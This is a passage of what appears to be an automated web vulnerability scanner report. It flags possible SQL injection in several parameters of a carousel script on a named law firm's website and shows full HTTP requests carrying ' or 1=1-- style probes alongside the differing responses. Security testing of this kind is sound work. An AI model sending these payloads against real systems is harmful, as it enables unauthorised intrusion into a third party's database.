<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysear
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm75027296'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
-->
...[SNIP]...

1.37. http://www.curtis.com/scripts/carousel/getimages.cfm [doctype parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The doctype parameter appears to be vulnerable to SQL injection attacks. The payloads 20635308'%20or%201%3d1--%20 and 20635308'%20or%201%3d2--%20 were each submitted in the doctype parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html20635308'%20or%201%3d1--%20&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html20635308'%20or%201%3d2--%20&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.38. http://www.curtis.com/scripts/carousel/getimages.cfm [first_last_buttons parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The first_last_buttons parameter appears to be vulnerable to SQL injection attacks. The payloads 21178287'%20or%201%3d1--%20 and 21178287'%20or%201%3d2--%20 were each submitted in the first_last_buttons parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no21178287'%20or%201%3d1--%20&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&w
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no21178287'%20or%201%3d2--%20&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&w
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.39. http://www.curtis.com/scripts/carousel/getimages.cfm [first_slide_is_intro parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The first_slide_is_intro parameter appears to be vulnerable to SQL injection attacks. The payloads 39183985'%20or%201%3d1--%20 and 39183985'%20or%201%3d2--%20 were each submitted in the first_slide_is_intro parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no39183985'%20or%201%3d1--%20&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no39183985'%20or%201%3d2--%20&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.40. http://www.curtis.com/scripts/carousel/getimages.cfm [hover_next_prev_buttons parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The hover_next_prev_buttons parameter appears to be vulnerable to SQL injection attacks. The payloads 11309222'%20or%201%3d1--%20 and 11309222'%20or%201%3d2--%20 were each submitted in the hover_next_prev_buttons parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no11309222'%20or%201%3d1--%20&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no11309222'%20or%201%3d2--%20&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.41. http://www.curtis.com/scripts/carousel/getimages.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 12395009%20or%201%3d1--%20 and 12395009%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 237

